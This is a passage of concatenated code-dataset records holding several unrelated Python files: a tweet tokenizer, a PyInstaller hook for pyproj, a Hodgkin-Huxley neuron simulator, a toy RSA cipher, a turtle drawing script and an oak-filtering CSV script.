[\"twitterProAna\",\"wordsAndPunct\",\"walworth\"]\ndef setupRegexes(style=\"twitterProAna\"):\n if style == regexStyles[0]: # twitterProAna or twitterEmoji\n def separateNumbers(m):\n if separateNumbers.string != m.string:\n separateNumbers.string = m.string\n separateNumbers.notParsing = False\n s=m.group()\n if s in set(('http','@','#')):\n separateNumbers.notParsing = True\n return s\n if s == ' ':\n separateNumbers.notParsing = False\n return s\n if separateNumbers.notParsing:\n return s\n return ' '+s+' '\n separateNumbers.string = None\n separateNumbers.searchString = r\"http|@|#|\\d+|\\s\"\n \n def skipEntities(m):\n \n return ' '+s+' '\n LIWC_punct = r\"\"\"'`\\[\\](){}⟨⟩:,\\-‒–—―!.?‘’“”\"•;…/\\|=+_~@#^&*<>\"\"\"\n cleaningReList = [ # surround punctuation with spaces (needs regex module, re module doesn't work!)\n (r\"(?V1)([\"+LIWC_punct+\"||[^\\p{Letter}\\p{Separator}\\p{Number}]])\",r\" \\1 \"),\n # standardise quote characters\n (u\"['`‘’“”\\\"]\",\"'\"),\n # standardise smileys\n (r\" [:=;] ( [\\-Do'`‘’xPpLCc\"'\"'r\"/,~] )?( [(\\[{] )+\",\" ): \"),\n (r\" [:=] ( [\\-Do'`‘’xPpLCc\"'\"'r\"/,~] )?( [)\\]}] )+\",\" (: \"),\n (r\" ; ( [\\-Do'`‘’xPpLCc\"'\"'r\"/~] )?( [)\\]}] )+|( [(\\[{] )+( [\\-Do'`‘’xPpLCc\"'\"'r\"/~] )? ; \",\" (; \"),\n (r\"(?])\"\"\",r\" \\1 \"),\n (u\"['`‘’’“”\\\"]\",\"'\"),\n (u\"[\\-‒–—―]\",\"-\"),\n (r\"(?<=[a-zA-Z])(?=\\d)|(?<=\\d)(?=[a-zA-Z])\",\" \"),\n (r\"(\\w) ' (\\w)\",r\"\\1'\\2\")\\\n ]\n if style == regexStyles[2]: # \"walworth\"\n cleaningReList.append((r\"(-\\s+)+\",r\"- \"))\n cleaningReList.append((r\".\\s*$\",r\"\"))\n else:\n raise ValueError(\"Possible regexStyles: %s\"%regexStyles) \n return cleaningReList\n\nregexList = setupRegexes()\n\ndef cleanString(regexList, text):\n '''Old cleanString function to support legacy code.'''\n text = unescape(text)\n if type(text) is str:\n try:\n text = text.decode('utf-8')\n except AttributeError:\n pass # python 3 strings don't do 'decode', but should be ok, so no need to do it anyway\n for regex in regexList:\n text = re.sub(regex[0],regex[1],text)\n return text\n\n\n# In[ ]:\n\ntry:\n tweetParser = ttp.Parser(include_spans=True)\nexcept AttributeError:\n tweetParser = None\n\n# ttpParserLookup\n \ndef tweetPreprocessor(text, entitiesToDetect=(\"urls\", \"users\", \"lists\", \"tags\")):\n \"\"\"Takes a string, returns tuples containing either \n (True, text_needing_parsing) or (False, entity_text_dont_parse)\n This relies on the ttp module for parsing tweets. If that module not present, it will silently pass the \n whole text with \"True\".\n \"\"\"\n try:\n entities = tweetParser.parse(text)\n except AttributeError:\n yield (True, text)\n return\n \n spans = []\n for label in entitiesToDetect:\n spanList = getattr(entities, label)\n if spanList:\n if label == 'lists':\n # lists are returned as a 3-tuple (name, user, (span)), we discard the user\n spanList = [(span[0], span[2]) for span in spanList] \n spans.extend(spanList)\n idx = 0\n for span in sorted(spans, key=itemgetter(1)):\n entityStart, entityEnd = span[1]\n startString = text[idx:entityStart]\n if startString:\n yield (True, startString)\n ent = text[entityStart:entityEnd]\n if ent:\n yield (False, ent)\n idx = entityEnd\n endString = text[idx:]\n if endString:\n yield (True, endString)\n\ndef tokenize(text, regexList=regexList, preprocessor=tweetPreprocessor):\n \"\"\"Tokenize a string, returning an iterator over tokens as strings.\n text : the string to be tokenized\n regexList : a list of (regex,replaceString) tuples, defaults to tweet specific processing\n preprocessor : a generator function preprocessor(text) which returns (boolean,substring) tuples, \n the boolean indicating if regexes should be applied. If None, apply regexes to original string.\n \n After applying regexes, the resulting string(s) are split on whitespace and yielded. Substrings returned by \n the preprocessor with False are yielded as is (no regexes, no split)\n \"\"\"\n subStringIter = preprocessor(text) if preprocessor else (True, text)\n for cleanIt, subString in subStringIter:\n if cleanIt:\n for word in cleanString(regexList, subString).split():\n yield word\n else:\n yield subString\n\n\n# In[6]:\n\n__doc__ = \"\"\"\nDefined functions setupRegexes(style=\\\"twitterProAna\\\"), cleanString(regexList, text) and tokenize(text).\nAvailable regexStyles are:\n\"\"\"\nfor s in regexStyles:\n __doc__ += \" %s\\n\"%s\n\n","sub_path":"fivePointRegression/drevicko/twitter_regexes.py","file_name":"twitter_regexes.py","file_ext":"py","file_size_in_byte":8086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"394549765","text":"# ------------------------------------------------------------------\n# Copyright (c) 2020 PyInstaller Development Team.\n#\n# This file is distributed under the terms of the GNU General Public\n# License (version 2.0 or later).\n#\n# The full license is available in LICENSE.GPL.txt, distributed with\n# this software.\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n# ------------------------------------------------------------------\n\nimport os\nimport sys\nfrom PyInstaller.utils.hooks import collect_data_files\nfrom PyInstaller.compat import is_win\n\n\nhiddenimports = [\n \"pyproj.datadir\"\n]\n\ndatas = collect_data_files('pyproj')\n\nif hasattr(sys, 'real_prefix'): # check if in a virtual environment\n root_path = sys.real_prefix\nelse:\n root_path = sys.prefix\n\n# - conda-specific\nif is_win:\n tgt_proj_data = os.path.join('Library', 'share', 'proj')\n src_proj_data = os.path.join(root_path, 'Library', 'share', 'proj')\n\nelse: # both linux and darwin\n tgt_proj_data = os.path.join('share', 'proj')\n src_proj_data = os.path.join(root_path, 'share', 'proj')\n\nfrom PyInstaller.compat import is_conda\nif is_conda:\n if os.path.exists(src_proj_data):\n datas.append((src_proj_data, tgt_proj_data))\n else:\n from PyInstaller.utils.hooks import logger\n logger.warning(\"Datas for pyproj not found at:\\n{}\".format(src_proj_data))\n # A runtime hook defines the path for `PROJ_LIB`\n","sub_path":"env/lib/python3.8/site-packages/_pyinstaller_hooks_contrib/hooks/stdhooks/hook-pyproj.py","file_name":"hook-pyproj.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"570599238","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 15 18:53:50 2018\n\n@author: ishida\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nclass Neuron_HH:\n def __init__(self, N=1, dt=0.04, T=100000, Cm=1, Vth=-56.2,\n gleak=0.0205, eleak=-70.3, gNa=56, eNa=50,\n gK=6, eK=-90, gm=0.075, tau_max=608,\n gtCa=0.4, eCa=120,\n syncp=1, Pmax_AMPA=1, Pmax_NMDA=1, tau_syn=5.26, esyn=0,\n Iext_amp=1, noise=2, D=0.5, alpha=0.5, beta=0.1, ramda=-10,\n Mg=1, delay=10, tau_rise_AMPA=1.1, tau_rise_NMDA=145, tau_inact_AMPA=5, tau_inact_NMDA=55,\n tau_rec_AMPA=200, tau_rec_NMDA=200, U_SE_AMPA=0.7, U_SE_NMDA=0.03, A_SE_AMPA=0.3, A_SE_NMDA=0.4,\n gaussian_scale=0.5, poisson_lam=0.5):\n # number of neuron\n self.N = N\n # time step\n self.dt = dt\n # simulation time\n self.T = T\n # all time\n self.Tsteps = np.arange(0, self.T, self.dt)\n # number of time steps\n self.allsteps = len(self.Tsteps)\n\n # membrane capacitance\n self.Cm = Cm\n # threshold voltage\n self.Vth = Vth\n\n # Refractory Period\n self.delay = delay\n\n # for dynamic synapse\n # time constant of synapse current\n self.tau_rise_AMPA = tau_rise_AMPA\n self.tau_rise_NMDA = tau_rise_NMDA\n self.tau_inact_AMPA = tau_inact_AMPA\n self.tau_inact_NMDA = tau_inact_NMDA\n self.tau_rec_AMPA = tau_rec_AMPA\n self.tau_rec_NMDA = tau_rec_NMDA\n\n self.U_SE_AMPA = U_SE_AMPA\n self.U_SE_NMDA = U_SE_NMDA\n\n self.A_SE_AMPA = A_SE_AMPA\n self.A_SE_NMDA = A_SE_NMDA\n\n # Recovered\n self.R_AMPA = 1 * np.ones((self.N, self.N, self.allsteps)) # need 3 dimension when making neuronal network\n self.dR_AMPA = 0\n self.R_NMDA = 1 * np.ones((self.N, self.N, self.allsteps))\n self.dR_NMDA = 0\n # Effective\n # self.E = 0 * np.ones((self.N, self.N, self.allsteps))\n # self.dE = 0\n self.E_AMPA = 0 * np.ones((self.N, self.N, self.allsteps))\n self.dE_AMPA = 0\n self.E_NMDA = 0 * np.ones((self.N, self.N, self.allsteps))\n self.dE_NMDA = 0\n # Inactive\n self.I_AMPA = 0 * np.ones((self.N, self.N, self.allsteps)) # I = 1 - R - E\n self.I_NMDA = 0 * np.ones((self.N, self.N, self.allsteps))\n\n # leak\n self.gleak = gleak * np.ones(self.N)\n self.eleak = eleak * np.ones(self.N)\n\n # Na\n self.gNa = gNa * np.ones(self.N)\n self.eNa = eNa * np.ones(self.N)\n\n # K\n self.gK = gK * np.ones(self.N)\n self.eK = eK * np.ones(self.N)\n self.tau_max = tau_max\n self.gm = gm * np.ones(self.N)\n\n # T type Ca\n self.gtCa = gtCa * np.ones(self.N)\n self.eCa = eCa * np.ones(self.N)\n\n # synapse\n self.tau_syn = tau_syn\n self.esyn = esyn * np.ones((self.N, self.N))\n self.gsyn = 0 * np.ones((self.N, self.N)) # gsyn = 0.025 と定義したけどここでは0にしている\n self.gAMPA = 0 * np.ones((self.N, self.N))\n self.gNMDA = 0 * np.ones((self.N, self.N))\n\n # voltage dependence of NMDA recepter\n self.Mg = Mg\n\n # type of synaptic coupling\n self.syncp = syncp\n\n self.Pmax_AMPA = Pmax_AMPA\n self.Pmax_NMDA = Pmax_NMDA\n self.fire_tmp = np.zeros(self.N)\n\n # noise\n self.noise = noise\n self.Inoise = np.zeros((self.N, self.allsteps))\n self.D = D # noise intensity\n self.gaussian_scale = gaussian_scale\n self.poisson_lam = poisson_lam\n\n # self.g = np.random.randn(self.N, self.allsteps)\n self.g = np.random.normal(0, self.dt**(1/2), (self.N, self.allsteps))\n # for Ornshtein-Uhlenbeck process\n\n self.alpha = alpha\n self.beta = beta\n self.ramda = ramda\n\n # firing time\n self.t_ap = -100000 * np.ones((self.N, self.N, 2))\n\n # voltage\n self.V = -65 * np.ones((self.N, self.allsteps))\n self.dV = 0 * np.ones(self.N)\n\n # current\n self.Ileak = 0 * np.ones((self.N, self.allsteps))\n self.INa = 0 * np.ones((self.N, self.allsteps))\n self.IK = 0 * np.ones((self.N, self.allsteps))\n self.Im = 0 * np.ones((self.N, self.allsteps))\n self.ItCa = 0 * np.ones((self.N, self.allsteps))\n\n # synapse current\n self.Isyn = np.zeros((self.N, self.allsteps))\n self.INMDA = np.zeros((self.N, self.allsteps))\n self.IAMPA = np.zeros((self.N, self.allsteps))\n\n self.m = 0.5 * np.ones((self.N, self.allsteps))\n self.h = 0.06 * np.ones((self.N, self.allsteps))\n self.n = 0.5 * np.ones((self.N, self.allsteps))\n self.p = 0.5 * np.ones((self.N, self.allsteps))\n self.u = 0.5 * np.ones((self.N, self.allsteps))\n\n self.alpha_m = 0 * np.ones((self.N, self.allsteps))\n self.beta_m = 0 * np.ones((self.N, self.allsteps))\n self.alpha_h = 0 * np.ones((self.N, self.allsteps))\n self.beta_h = 0 * np.ones((self.N, self.allsteps))\n self.alpha_n = 0 * np.ones((self.N, self.allsteps))\n self.beta_n = 0 * np.ones((self.N, self.allsteps))\n self.p_inf = 0 * np.ones((self.N, self.allsteps))\n self.tau_p = 0 * np.ones((self.N, self.allsteps))\n self.s_inf = 0 * np.ones((self.N, self.allsteps))\n self.u_inf = 0 * np.ones((self.N, self.allsteps))\n self.tau_u = 0 * np.ones((self.N, self.allsteps))\n\n self.dm = 0 * np.ones(self.N)\n self.dh = 0 * np.ones(self.N)\n self.dn = 0 * np.ones(self.N)\n self.dp = 0 * np.ones(self.N)\n self.du = 0 * np.ones(self.N)\n\n # external input current\n self.Iext_amp = Iext_amp\n\n self.Iext = np.zeros((self.N, self.allsteps))\n\n \"\"\"\n self.Iext[0, 10000:20000] = -self.Iext_amp\n self.Iext[0, 25000:35000] = self.Iext_amp\n self.Iext[0, 40000:50000] = 2 * self.Iext_amp\n \"\"\"\n \"\"\"\n # input current as delta function\n self.Iext[0, int(60000/self.dt):int(60005/self.dt)] = self.Iext_amp\n \"\"\"\n self.Iext[0, int(2000/self.dt):int(8000/self.dt)] = self.Iext_amp\n\n # current step\n self.curstep = 0\n\n def biexp_func(self, t, Pmax, t_rise, t_fall):\n if t < 0:\n return 0\n elif Pmax * (np.exp(- t / t_fall) - np.exp(- t / t_rise)) < 0.00001:\n return 0\n else:\n return Pmax * (np.exp(- t / t_fall) - np.exp(- t / t_rise))\n\n def exp_decay(self, x, tau_rise):\n if (x / tau_rise) > 100:\n return 0\n else:\n return np.exp(- x / tau_rise)\n\n def normalize_AMPA(self, U_SE_AMPA):\n if U_SE_AMPA == 0.1:\n return 1 / 0.0559324\n elif U_SE_AMPA == 0.2:\n return 1 / 0.1167792\n elif U_SE_AMPA == 0.3:\n return 1 / 0.1683591\n elif U_SE_AMPA == 0.4:\n return 1 / 0.2159080\n elif U_SE_AMPA == 0.5:\n return 1 / 0.2753359\n elif U_SE_AMPA == 0.6:\n return 1 / 0.3172174\n elif U_SE_AMPA == 0.7:\n return 1 / 0.37\n elif U_SE_AMPA == 0.8:\n return 1 / 0.4222531\n elif U_SE_AMPA == 0.9:\n return 1 / 0.468\n elif U_SE_AMPA == 0.03:\n return 1 / 0.0172168\n\n def normalize_NMDA(self):\n return 1 / 0.43\n\n def calc_synaptic_input(self, i):\n # recording present fire time as previous fire time\n # if self.Vi[i] > -20 and (self.curstep * self.dt - self.fire_tmp[i]) > self.delay and self.curstep * self.dt > 200:\n if self.Vi[i] > -20 and self.curstep * self.dt > 200:\n self.t_ap[i, :, 1] = self.t_ap[i, :, 0]\n self.t_ap[i, :, 0] = self.curstep * self.dt\n self.fire_tmp[i] = self.curstep * self.dt\n\n # sum of the synaptic current for each neuron\n # syncp\n # 1 : biexp_func()\n # 2 : dynamic_synapse\n # 3 : no synapse current\n\n if self.syncp == 1:\n for j in range(0, self.N):\n\n if self.curstep * self.dt > 200:\n \"\"\"\n self.gAMPA[i, j] = self.biexp_func(self.curstep * self.dt - self.t_ap[j, i, 0], self.Pmax_AMPA, 1, 2)\n self.gNMDA[i, j] = (self.biexp_func(self.curstep * self.dt - self.t_ap[j, i, 0],\n self.Pmax_NMDA, 10, 150) / (\n 1 + (4.5 / 3.57) * np.exp(- 0.062 * self.Vi))) / (\n 1 + (self.Mg / 3.57) * np.exp(self.Vi / 16.13))\n \"\"\"\n self.gNMDA[i, j] = self.biexp_func(self.curstep * self.dt - self.t_ap[j, i, 0], self.Pmax_NMDA, 20, 125) / (1 + (self.Mg / 3.57) * np.exp(-0.062 * self.Vi))\n self.gAMPA[i, j] = self.biexp_func(self.curstep * self.dt - self.t_ap[j, i, 0], self.Pmax_AMPA, 0.8, 5)\n\n self.gsyn[i, j] = self.gAMPA[i, j] + self.gNMDA[i, j]\n\n else:\n self.gsyn[i, j] = 0\n\n if self.syncp == 2:\n for j in range(0, self.N):\n \"\"\"\n self.dR_AMPA = (self.dt * ((self.I_AMPA[i, j, self.curstep] / self.tau_rec_AMPA)\n - self.R_AMPA[i, j, self.curstep] * self.U_SE_AMPA * self.exp_decay(self.curstep * self.dt - (self.t_ap[j, i, 0] + self.delay), self.tau_rise_AMPA)))\n self.dR_NMDA = (self.dt * ((self.I_AMPA[i, j, self.curstep] / self.tau_rec_NMDA)\n - self.R_NMDA[i, j, self.curstep] * self.U_SE_NMDA * self.exp_decay(self.curstep * self.dt - (self.t_ap[j, i, 0] + self.delay), self.tau_rise_NMDA)))\n self.dE_AMPA = (self.dt * ((- self.E_AMPA[i, j, self.curstep] / self.tau_inact_AMPA)\n + self.U_SE_AMPA * self.R_AMPA[i, j, self.curstep] * self.exp_decay(self.curstep * self.dt - (self.t_ap[j, i, 0] + self.delay), self.tau_rise_AMPA)))\n self.dE_NMDA = (self.dt * ((- self.E_NMDA[i, j, self.curstep] / self.tau_inact_NMDA)\n + self.U_SE_NMDA * self.R_NMDA[i, j, self.curstep] * self.exp_decay(self.curstep * self.dt - (self.t_ap[j, i, 0] + self.delay), self.tau_rise_NMDA)))\n \"\"\"\n self.dR_AMPA = (self.dt * ((self.I_AMPA[i, j, self.curstep] / self.tau_rec_AMPA)\n - self.R_AMPA[i, j, self.curstep] * self.U_SE_AMPA * self.exp_decay(\n self.curstep * self.dt - self.t_ap[j, i, 0], self.tau_rise_AMPA)))\n self.dR_NMDA = (self.dt * ((self.I_AMPA[i, j, self.curstep] / self.tau_rec_NMDA)\n - self.R_NMDA[i, j, self.curstep] * self.U_SE_NMDA * self.exp_decay(\n self.curstep * self.dt - self.t_ap[j, i, 0], self.tau_rise_NMDA)))\n self.dE_AMPA = (self.dt * ((- self.E_AMPA[i, j, self.curstep] / self.tau_inact_AMPA)\n + self.U_SE_AMPA * self.R_AMPA[i, j, self.curstep] * self.exp_decay(\n self.curstep * self.dt - self.t_ap[j, i, 0], self.tau_rise_AMPA)))\n self.dE_NMDA = (self.dt * ((- self.E_NMDA[i, j, self.curstep] / self.tau_inact_NMDA)\n + self.U_SE_NMDA * self.R_NMDA[i, j, self.curstep] * self.exp_decay(\n self.curstep * self.dt - self.t_ap[j, i, 0], self.tau_rise_NMDA)))\n\n self.R_AMPA[i, j, self.curstep + 1] = self.R_AMPA[i, j, self.curstep] + self.dR_AMPA\n self.R_NMDA[i, j, self.curstep + 1] = self.R_NMDA[i, j, self.curstep] + self.dR_NMDA\n self.E_AMPA[i, j, self.curstep + 1] = self.E_AMPA[i, j, self.curstep] + self.dE_AMPA\n self.E_NMDA[i, j, self.curstep + 1] = self.E_NMDA[i, j, self.curstep] + self.dE_NMDA\n self.I_AMPA[i, j, self.curstep + 1] = 1 - self.R_AMPA[i, j, self.curstep + 1] - self.E_AMPA[i, j, self.curstep + 1]\n self.I_NMDA[i, j, self.curstep + 1] = 1 - self.R_NMDA[i, j, self.curstep + 1] - self.E_NMDA[i, j, self.curstep + 1]\n \"\"\"\n self.gNMDA[i, j] = self.A_SE_NMDA * self.E_NMDA[i, j, self.curstep] / (1 + (self.Mg / 3.57) * np.exp(-0.062 * self.Vi))\n self.gAMPA[i, j] = self.A_SE_AMPA * self.E_AMPA[i, j, self.curstep]\n \"\"\"\n\n # normalize E_NMDA & E_AMPA\n self.gNMDA[i, j] = self.normalize_NMDA() * self.A_SE_NMDA * self.E_NMDA[i, j, self.curstep] / (\n 1 + (self.Mg / 3.57) * np.exp(-0.062 * self.Vi))\n self.gAMPA[i, j] = self.normalize_AMPA(self.U_SE_AMPA) * self.A_SE_AMPA * self.E_AMPA[i, j, self.curstep]\n\n if self.syncp == 3:\n pass\n\n # sum\n for j in range(0, self.N):\n self.IAMPAi[j] += self.gAMPA[i, j] * (self.esyn[i, j] - self.Vi[j])\n self.INMDAi[j] += self.gNMDA[i, j] * (self.esyn[i, j] - self.Vi[j])\n self.Isyni[j] = self.IAMPAi[j] + self.INMDAi[j]\n \"\"\"\n for j in range(0, self.N):\n self.IAMPAi[i] += self.gAMPA[i, j] * (self.esyn[i, j] - self.Vi[i])\n self.INMDAi[i] += self.gNMDA[i, j] * (self.esyn[i, j] - self.Vi[i])\n self.Isyni[i] = self.IAMPAi[i] + self.INMDAi[i]\n \"\"\"\n\n self.IAMPA[i, self.curstep] = self.IAMPAi[i]\n self.INMDA[i, self.curstep] = self.INMDAi[i]\n self.Isyn[i, self.curstep] = self.Isyni[i]\n\n # activation function\n # a / (1 + exp(b * (x - c))\n def activation_func_sigmoid(self, a, b, c, v):\n return a / (1.0 + np.exp(np.clip(b * (v - c), -500, 500)))\n\n # a * exp(b * (v - c))\n def activation_func_exp(self, a, b, c, v):\n return a * np.exp(np.clip(b * (v - c), -500, 500))\n\n # a * (v - b) / (exp(c * (v - d)) - 1)\n def activation_func_ReLUlike(self, a, b, c, d, v):\n return a * (v - b) / (np.exp(np.clip(c * (v - d), -500, 500)) - 1)\n\n def propagation(self):\n\n self.Vi = self.V[:, self.curstep]\n\n self.Ileaki = self.Ileak[:, self.curstep]\n self.INai = self.INa[:, self.curstep]\n self.IKi = self.IK[:, self.curstep]\n self.Imi = self.Im[:, self.curstep]\n self.ItCai = self.ItCa[:, self.curstep]\n\n self.Isyni = self.Isyn[:, self.curstep]\n self.IAMPAi = self.IAMPA[:, self.curstep]\n self.INMDAi = self.INMDA[:, self.curstep]\n\n self.Inoisei = self.Inoise[:, self.curstep]\n\n self.mi = self.m[:, self.curstep]\n self.hi = self.h[:, self.curstep]\n self.ni = self.n[:, self.curstep]\n self.pi = self.p[:, self.curstep]\n self.ui = self.u[:, self.curstep]\n\n self.alpha_mi = self.alpha_m[:, self.curstep]\n self.beta_mi = self.beta_m[:, self.curstep]\n self.alpha_hi = self.alpha_h[:, self.curstep]\n self.beta_hi = self.beta_h[:, self.curstep]\n self.alpha_ni = self.alpha_n[:, self.curstep]\n self.beta_ni = self.beta_n[:, self.curstep]\n self.p_infi = self.p_inf[:, self.curstep]\n self.tau_pi = self.tau_p[:, self.curstep]\n self.s_infi = self.s_inf[:, self.curstep]\n self.u_infi = self.u_inf[:, self.curstep]\n self.tau_ui = self.tau_u[:, self.curstep]\n\n for i in range(0, self.N):\n self.calc_synaptic_input(i)\n\n # noise type\n # 1 : gaussian white noise\n # 2 : Ornstein-Uhlenbeck process\n # 3 : pass (no noise)\n # 4 : DC\n # 5 : AMPA noise\n\n if self.noise == 1:\n self.Inoise[:, self.curstep + 1] = self.D * self.g[:, self.curstep]\n\n elif self.noise == 2:\n self.Inoise[:, self.curstep + 1] = (self.Inoisei +\n (- self.alpha * (self.Inoisei - self.beta) * self.dt\n + self.D * self.g[:, self.curstep]))\n\n elif self.noise == 3:\n pass\n\n elif self.noise == 4:\n self.Inoise[:, self.curstep + 1] = 0.2\n\n elif self.noise == 5:\n self.Inoise[:, self.curstep + 1] = (np.random.normal(loc=0, scale=self.gaussian_scale)\n + np.random.poisson(lam=self.poisson_lam) * self.A_SE_AMPA * 2)\n\n # solve a defferential equation\n self.alpha_mi = self. activation_func_ReLUlike(-0.32, self.Vth + 13, -1/4, self.Vth + 13, self.Vi)\n self.beta_mi = self.activation_func_ReLUlike(0.28, self.Vth + 40, 1/5, self.Vth + 40, self.Vi)\n self.alpha_hi = self.activation_func_exp(0.128, -1/18, self.Vth + 17, self.Vi)\n self.beta_hi = self.activation_func_sigmoid(4, -1/5, self.Vth + 40, self.Vi)\n self.alpha_ni = self.activation_func_ReLUlike(-0.032, self.Vth + 15, -1/5, self.Vth + 15, self.Vi)\n self.beta_ni = self.activation_func_exp(0.5, -1/40, self.Vth + 10, self.Vi)\n self.p_infi = self.activation_func_sigmoid(1, -1/10, -35, self.Vi)\n self.tau_pi = (self.tau_max /\n (3.3 * np.exp(np.clip((self.Vi + 35) / 20, -709, 10000)) +\n np.exp(- np.clip((self.Vi + 35) / 20, -709, 10000))))\n self.s_infi = self.activation_func_sigmoid(1, -1/6.2, -2 - 57, self.Vi)\n self.u_infi = self.activation_func_sigmoid(1, 1/4, -2 - 81, self.Vi)\n self.tau_ui = 30.8 + (211.4 + np.exp(np.clip((self.Vi + 2 + 113.2) / 5, -709, 10000))) / \\\n (3.7 * (1 + np.exp(np.clip((self.Vi + 2 + 84) / 3.2, -709, 10000))))\n\n self.Ileaki = self.gleak * (self.eleak - self.Vi)\n self.INai = self.gNa * self.mi ** 3 * self.hi * (self.eNa - self.Vi)\n self.IKi = self.gK * self.ni ** 4 * (self.eK - self.Vi)\n self.Imi = self.gm * self.pi * (self.eK - self.Vi)\n self.ItCai = self.gtCa * self.s_infi ** 2 * self.ui * (self.eCa - self.Vi)\n\n \"\"\"\n self.dV = (self.dt *\n (self.Ileaki + self.INai + self.IKi + self.Imi + self.ItCai +\n self.Isyni + self.Inoisei + self.Iext[:, self.curstep]) /\n self.Cm)\n \"\"\"\n self.dV = (self.dt *\n (self.Ileaki + self.INai + self.IKi + self.Imi +\n self.Isyni + self.Inoisei + self.Iext[:, self.curstep]) /\n self.Cm)\n\n # (self.curstep * self.dt) < 200 で self.Isyni は常に0では?\n if (self.curstep * self.dt) < 200:\n self.dV -= self.Isyni\n\n self.dm = self.dt * (self.alpha_mi * (1 - self.mi) - self.beta_mi * self.mi)\n self.dh = self.dt * (self.alpha_hi * (1 - self.hi) - self.beta_hi * self.hi)\n self.dn = self.dt * (self.alpha_ni * (1 - self.ni) - self.beta_ni * self.ni)\n self.dp = self.dt * (self.p_infi - self.pi) / self.tau_pi\n self.du = self.dt * (self.u_infi - self.ui) / self.tau_ui\n\n self.V[:, self.curstep + 1] = self.Vi + self.dV\n\n self.m[:, self.curstep + 1] = self.mi + self.dm\n self.h[:, self.curstep + 1] = self.hi + self.dh\n self.n[:, self.curstep + 1] = self.ni + self.dn\n self.p[:, self.curstep + 1] = self.pi + self.dp\n self.u[:, self.curstep + 1] = self.ui + self.du\n\n self.Ileak[:, self.curstep] = self.Ileaki\n self.INa[:, self.curstep] = self.INai\n self.IK[:, self.curstep] = self.IKi\n self.Im[:, self.curstep] = self.Imi\n self.ItCa[:, self.curstep] = self.ItCai\n\n self.Isyn[:, self.curstep] = self.Isyni\n\n self.curstep += 1\n\n\n\"\"\"\ndef main():\n neuron = Neuron_HH(syncp=2, U_SE_AMPA=0.7, tau_rise_AMPA=1.1, A_SE_AMPA=0.3, A_SE_NMDA=0.4, noise=2, T=70000, Iext_amp=10)\n for i in range(0, neuron.allsteps-1):\n neuron.propagation()\n\n ax1 = plt.subplot2grid((3, 1), (0, 0))\n ax1.plot(neuron.Tsteps, neuron.V[0])\n ax1.set_title('V')\n ax2 = plt.subplot2grid((3, 1), (1, 0))\n ax2.plot(neuron.Tsteps, neuron.IAMPA[0])\n ax2.set_title('I_AMPA [uA]')\n ax3 = plt.subplot2grid((3, 1), (2, 0))\n ax3.plot(neuron.Tsteps, neuron.INMDA[0])\n ax3.set_title('I_NMDA [uA]')\n\n plt.tight_layout()\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n\"\"\"\n","sub_path":"HHmodel_folder/MinimalHH_class_AF_DecaySyn/neuron_class.py","file_name":"neuron_class.py","file_ext":"py","file_size_in_byte":20361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"460985781","text":"import random\n\n\n\ndef encrypt(message, key):\n enc_m = ''\n for byte in bytearray(message, 'utf-8'):\n c = byte ** key[1] % key[0]\n enc_m += hex(c)\n return enc_m\n\n\ndef decrypt(message, key):\n res = ''\n splited_mess = message.split('0x')\n for byte in splited_mess:\n if byte != '':\n dec_mess = int(byte, 16) ** key[1] % key[0]\n res += chr(dec_mess)\n return res\n\n\ndef generate_keys(size):\n p = random.choice(size)\n if p % 2 == 0:\n p += 1\n q = random.randint(size)\n if q % 2 == 0:\n q += 1\n n = p * q\n fi_n = (p - 1) * (q - 1)\n e = 11\n start_k = 0\n k = generate_k(start_k, fi_n, e)\n d = int((k * fi_n + 1) / e)\n return (n, e), (n, d)\n\n\ndef generate_k(k, fi_n, e):\n res = (k * fi_n + 1) % e\n if res == 0:\n return k\n else:\n return generate_k(k=k + 1, fi_n=fi_n, e=e)\n\n\nst_message = 'hello world how are you, bro .'\npublicKey, privateKey = generate_keys(20)\nencrypted_message = encrypt(st_message, publicKey)\ndecrypred_message = decrypt(encrypted_message, privateKey)\nprint(encrypted_message)\nprint(decrypred_message)\n","sub_path":"cipher.py","file_name":"cipher.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"206333491","text":"import turtle\r\n\r\nrainbow = [\"red\", \"orange\", \"yellow\", \"green\", \"blue\", \"purple\"]\r\n\r\n# Write whatever code you want here!\r\nterry = turtle.Turtle()\r\nterry.width(10)\r\nfor color in rainbow:\r\n \r\n terry.color(color)\r\n terry.forward(50)\r\n terry.right(60)\r\n \r\nterry.hideturtle()","sub_path":"3_29-六边形练习.py","file_name":"3_29-六边形练习.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"462583514","text":"#!/usr/bin/env python3\n\n\"\"\"Debugs the is_an_oak function and modifies it's output\"\"\"\n\n__appname__ = '[oaks_debugme.py]'\n__author__ = 'CMEE G1'\n__version__= '0.0.1'\n__license__ = \"License for this code/program\"\n\nimport csv\nimport sys\n\n#Define function\ndef is_an_oak(name):\n \"\"\" Returns True if name is starts with 'quercus' \n >>> is_an_oak('Quercus')\n True\n\n >>> is_an_oak('Pinus')\n False\n\n >>> is_an_oak('Quercus robur')\n True\n\n >>> is_an_oak('Quercuss')\n True\n\n >>> is_an_oak('Quercuss robur')\n False\n\n >>> is_an_oak('QQuercus')\n False\n\n >>> is_an_oak('QUERCUS')\n True\n \"\"\"\n return name.lower().startswith('quercus')\n\n \ndef main(argv): \n \"\"\"Main function that runs\"\"\"\n f = open('../Data/TestOaksData.csv','r')\n g = open('../Data/JustOaksData.csv','w')\n taxa = csv.reader(f)\n csvwrite = csv.writer(g)\n csvwrite.writerow([\"Genus\", \"species\"])\n\n for row in taxa:\n if row[0].lower() != \"genus\":\n print(row)\n print(\"The genus is: \") \n print(row[0] + '\\n')\n if is_an_oak(row[0]):\n print('FOUND AN OAK!\\n')\n csvwrite.writerow([row[0], row[1]]) \n\n return 0\n \nif (__name__ == \"__main__\"):\n \"\"\"Ensures main functions runs when script is called\"\"\"\n status = 